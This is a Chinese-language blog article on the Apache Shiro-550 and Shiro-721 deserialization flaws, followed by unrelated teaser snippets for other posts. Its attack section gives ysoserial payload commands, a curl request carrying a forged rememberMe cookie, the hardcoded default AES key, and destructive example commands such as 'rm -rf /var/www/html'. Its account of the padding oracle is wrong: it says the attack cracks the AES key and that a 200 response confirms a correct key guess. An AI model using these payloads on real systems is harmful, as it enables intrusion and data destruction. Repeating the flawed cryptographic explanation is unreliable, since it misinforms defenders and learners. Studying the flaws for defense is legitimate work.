当前位置：首页 > news >正文

Apache Shiro 反序列化漏洞全解析（Shiro-550 Shiro-721）

news 2025/11/6 16:27:35

一、前言

Apache Shiro 是一个强大的 Java 安全框架，广泛用于用户认证、授权、加密和会话管理。然而，由于 Shiro 在某些版本中存在反序列化漏洞，攻击者可以通过特定手法实现远程代码执行（RCE），进而获取服务器控制权。

本文将深入剖析 Shiro-550 和 Shiro-721 漏洞，从原理、发现方法到实际攻击演示，确保读者从认知到实战都能掌握。

二、Shiro 反序列化漏洞概述

1. Shiro-550（CVE-2016-4437）漏洞原理

（1）漏洞影响范围

Apache Shiro <= 1.2.4
默认使用 CookieRememberMeManager 处理 rememberMe Cookie

（2）漏洞原理

Shiro-550 存在于 rememberMe 机制的处理流程：

用户登录后，Shiro 会将用户信息 序列化 -> AES 加密 -> Base64 编码 后存入 rememberMe Cookie。
服务器收到请求时，会 Base64 解码 -> AES 解密 -> 反序列化，恢复用户信息。
问题：Shiro 默认使用的 AES 密钥是硬编码的！
- 攻击者可以通过 爆破密钥，伪造一个恶意的 rememberMe Cookie，执行远程代码。

2. Shiro-721（CVE-2019-12422）漏洞原理

（1）漏洞影响范围

Apache Shiro < 1.4.2

（2）漏洞原理

Shiro-721 主要是由于 AES-128-CBC 加密的 Padding Oracle 攻击：

攻击者可以利用服务器返回的错误信息，逐步猜测加密数据，破解 AES 密钥。
拿到密钥后，攻击者可以 伪造恶意 Cookie，实现反序列化攻击。

三、漏洞发现与利用

1. 如何发现 Shiro 漏洞？

（1）观察 `Set-Cookie` 头部

如果 HTTP 响应中包含：

Set-Cookie: rememberMe=deleteMe

说明目标网站使用了 Shiro，并可能存在漏洞。

（2）测试加密机制

复制 rememberMe Cookie。
修改 Cookie 内容，观察返回是否包含 deleteMe，验证加密是否有效。

2. Shiro-550 攻击实战

（1）爆破密钥

攻击者使用 shiro_attack.py 爆破默认密钥：

python shiro_attack.py --target http://example.com --keylist shiro_keys.txt

如果成功，返回密钥：

kPH+bIxk5D2deZiIxcaaaA==

（2）生成恶意 Cookie

使用 ysoserial 生成恶意 Payload：

java -jar ysoserial.jar CommonsCollections5 "touch /tmp/hacked" | base64 > payload.txt

然后用 AES 密钥加密，并 Base64 编码，得到恶意 rememberMe Cookie。

（3）发送攻击请求

curl -X GET http://example.com -H "Cookie: rememberMe=<恶意cookie>"

成功后，服务器会执行 touch /tmp/hacked，证明被攻击成功。

3. Shiro-721 攻击实战

（1）Padding Oracle 攻击

攻击者利用 padding_oracle_attack.py 逐步猜测 AES 密钥：

python padding_oracle_attack.py --target http://example.com --cookie "rememberMe=xyz..."

如果服务器返回：

500 错误 → 说明猜错了，继续试。
200 OK → 说明密钥猜对了，成功解密！

（2）生成恶意 Cookie 并攻击

java -jar ysoserial.jar CommonsBeanutils1 "cat /etc/passwd" | base64

然后替换 rememberMe，发送攻击请求，服务器执行命令。

四、实战案例

1. 某知名 CMS 被黑

某 CMS 后台使用 Shiro-550，黑客利用默认密钥 kPH+bIxk5D2deZiIxcaaaA==，成功执行：

rm -rf /var/www/html

结果：整个网站首页被删光！

2. 金融网站数据泄露

黑客使用 Shiro-721 进行 Padding Oracle 攻击，解密 rememberMe，成功执行：

cat /etc/passwd

结果：服务器所有用户信息被盗取！

五、防御措施

防御措施	适用漏洞	说明
升级 Shiro	Shiro-550 / 721	升级到 1.4.2+ 版本，漏洞已修复
修改默认密钥	Shiro-550	避免使用 `kPH+bIxk5D2deZiIxcaaaA==`，随机生成新密钥
禁用不必要的反序列化功能	Shiro-550 / 721	使用 JSON 存储用户信息，而非 Java 序列化
检测 Padding Oracle 攻击	Shiro-721	监控异常 Cookie，请求不同错误返回码

六、总结

Apache Shiro 反序列化漏洞是一个高危安全风险，攻击者可通过 爆破密钥（Shiro-550）或 Padding Oracle 攻击（Shiro-721），实现远程代码执行。

本篇文章从漏洞原理、发现方法到攻击演示，全面解析了 Shiro 反序列化漏洞，并提供了真实案例和防御措施。

如果你觉得本文对你有帮助，欢迎点赞、收藏，并分享给更多安全从业者！🚀

Apache Shiro 反序列化漏洞全解析（Shiro-550 Shiro-721）

一、前言 Apache Shiro 是一个强大的 Java 安全框架，广泛用于用户认证、授权、加密和会话管理。然而，由于 Shiro 在某些版本中存在反序列化漏洞，攻击者可以通过特定手法实现远程代码执行（RCE），进而获取服务…...

编程日记 2025/3/7 21:15:37

计算机毕业设计Python+DeepSeek-R1大模型空气质量预测分析(源码+文档+PPT+讲解)

温馨提示：文末有 CSDN 平台官方提供的学长联系方式的名片！ 温馨提示：文末有 CSDN 平台官方提供的学长联系方式的名片！ 温馨提示：文末有 CSDN 平台官方提供的学长联系方式的名片！ 作者简介：Java领…...

编程日记 2025/3/7 21:13:34

实例详细演示在Pytest中如何忽略警告

关注开源优测不迷路大数据测试过程、策略及挑战测试框架原理，构建成功的基石在自动化测试工作之前，你应该知道的10条建议在自动化测试中，重要的不是工具当你尝试运行Pytest代码时，那些不相关的警告突然弹出，是不是…...

编程日记 2025/3/7 21:12:33

03 HarmonyOS Next仪表盘案例详解（二）：进阶篇

温馨提示：本篇博客的详细代码已发布到 git : https://gitcode.com/nutpi/HarmonyosNext 可以下载运行哦！ 文章目录前言1. 响应式设计1.1 屏幕适配1.2 弹性布局 2. 数据展示与交互2.1 数据卡片渲染2.2 图表区域 3. 事件处理机制3.1 点击事件处理3.2 手势…...

编程日记 2025/3/7 21:11:32

mysql进阶（三）

MySQL架构和存储引擎 1. MySQL架构 MySQL8.0服务器是由连接池、服务管理⼯具和公共组件、NoSQL接⼝、SQL接⼝、解析器、优化器、缓存、存储引擎、⽂件系统组成。MySQL还为各种编程语⾔提供了⼀套⽤于外部程序访问服务器的连接器。整体架构图如下所⽰： 2. 连接层 …...

编程日记 2025/3/7 21:06:25

MySQL 架构、索引优化、DDL解析、死锁排查

私人博客传送门 MySQL 认识索引 | 魔筝炼药师 MySQL 索引优化 | 魔筝炼药师 OnlineDDL（在 MySQL 5.7 数据库里，InnoDB引擎，执行一条DDL会发生什么事情） | 魔筝炼药师 MySQL 死锁排查 | 魔筝炼药师...

编程日记 2025/3/7 21:04:22

AVM 环视拼接鱼眼相机

https://zhuanlan.zhihu.com/p/651306620 AVM 环视拼接方法介绍从内外参推导IPM变换方程及代码实现（生成AVM环视拼接图）_avm拼接-CSDN博客经典文献阅读之--Extrinsic Self-calibration of the Surround-view System: A Weakly... (环视系统的外参自…...

编程日记 2025/3/7 21:03:19

【Flink银行反欺诈系统设计方案】5.反欺诈系统全生命周期设计

【Flink银行反欺诈系统设计方案】反欺诈系统全生命周期设计概要：1. 事前反欺诈准备核心模块与架构： 2. 事中反欺诈发现与告警核心模块与架构： 3. 事后反欺诈事件分析核心模块与架构： 4. 反欺诈闭环架构设计整体技术栈&#xff1a…...

编程日记 2025/3/7 21:00:15

aardio - 虚表 —— 两个虚表之间互相拖动交换数据

插入到虚表末尾的方法： import win.ui; import godking.vlistEx; /*DSG{{*/ mainForm win.form(text"vlistEx - table adapter";right849;bottom578;border"thin") mainForm.add( radiobutton{cls"radiobutton";text"移动&qu…...

编程日记 2025/3/7 20:56:11

VScode 中文符号出现黄色方框的解决方法

VScode 中文符号出现黄色方框的解决方法我的vscode的python多行注释中会将中文字符用黄色方框框处： 只需要打开设置搜索unicode，然后将这一项的勾选取消掉就可以了： 取消之后的效果如下： 另一种情况：中文显示出现黄色…...

编程日记 2025/3/7 20:55:10

LINUX网络基础 [二] - 网络编程套接字，UDP与TCP

目录前言一. 端口号的认识 1.1 端口号的作用二. 初识TCP协议和UDP协议 2.1 TCP协议 TCP的特点使用场景 2.2 UDP协议 UDP的特点使用场景 2.3 TCP与UDP的对比 2.4 思考 2.5 总结三. 网络字节序 3.1 网络字节序的介绍 3.2 网络字节序思考四. socket接口 …...

编程日记 2025/3/7 20:53:08

Spring统一格式返回

目录一：统一结果返回 1：统一结果返回写法 2：String类型报错问题解决方法二：统一异常返回统一异常返回写法三：总结同志们，今天咱来讲一讲统一格式返回啊，也是好久没有讲过统一格式返…...

编程日记 2025/3/7 20:52:07

Unity多Pass渲染与GPU Instancing深度优化指南

一、技术背景与挑战 1. 多Pass渲染的定位多Pass渲染策略通过单个Shader中定义多个渲染阶段（如阴影生成、光照计算、后处理等）实现复杂视觉效果，但传统实现会显著增加DrawCall数量。例如标准渲染管线中，一个物体可能经历Base Pa…...

编程日记 2025/3/7 20:49:02

Redis高频面试题10个

1. Redis 的特点及与 Memcached 的区别特点： 基于内存的键值数据库，支持持久化（RDB/AOF）。单线程模型，通过 IO 多路复用实现高并发。支持多种数据结构：字符串、哈希、列表、集合、有序集合等。提供…...

编程日记 2025/3/7 20:45:59

【数据库】MySQL常见聚合查询详解

在数据库操作中，聚合查询是非常重要的一部分。通过聚合查询，我们可以对数据进行汇总、统计和分析。MySQL提供了丰富的聚合函数来满足不同的需求。本文将详细介绍MySQL中常见的40个聚合函数及其使用场景，并通过8个的案例展示它们的用法。一、…...

编程日记 2025/3/7 20:42:55

蓝桥备赛（11）- 数据结构、算法与STL

一、数据结构 1.1 什么是数据结构？ 在计算机科学中，数据结构是一种数据组织、管理和存储的格式。它是相互之间存在一种或多种特定关系的数据元素的集合。 ---> 通俗点，数据结构就是数据的组织形式 ， 研究数据是用什么方…...

编程日记 2025/3/7 20:36:49

Linux的系统ip管理

ip地址命令：ifconfig 127.0.0.1这个ip地址用于指本机。 0.0.0.0特殊ip地址用于指代本机，可以在端口绑定中用来确定绑定关系，在一些ip地址限制中，表示所有ip的意思。如放行规则设置为0.0.0.0，表示允许任意ip访问。 …...

编程日记 2025/3/7 20:35:48

【决策树】分类属性的选择

文章目录 1.信息增益（ID3）2.信息增益率（C4.5）3.基尼指数（CART）ps.三者对比实现决策树算法最关键的一点就是如何从所有的特征属性中选择一个最优的属性对样本进行分类，这种最优可以理解为希望划…...

编程日记 2025/3/7 20:34:45

uniapp vue3 微信小程序 uni.chooseLocation使用

申请先要去微信公众平台申请使用接口开通成功之后就可以在项目中配置使用了配置配置manifest.json "mp-weixin": {/* 小程序特有相关 */"requiredPrivateInfos": ["chooseLocation"],"permission": {"scope.userLocati…...

编程日记 2025/3/7 20:32:42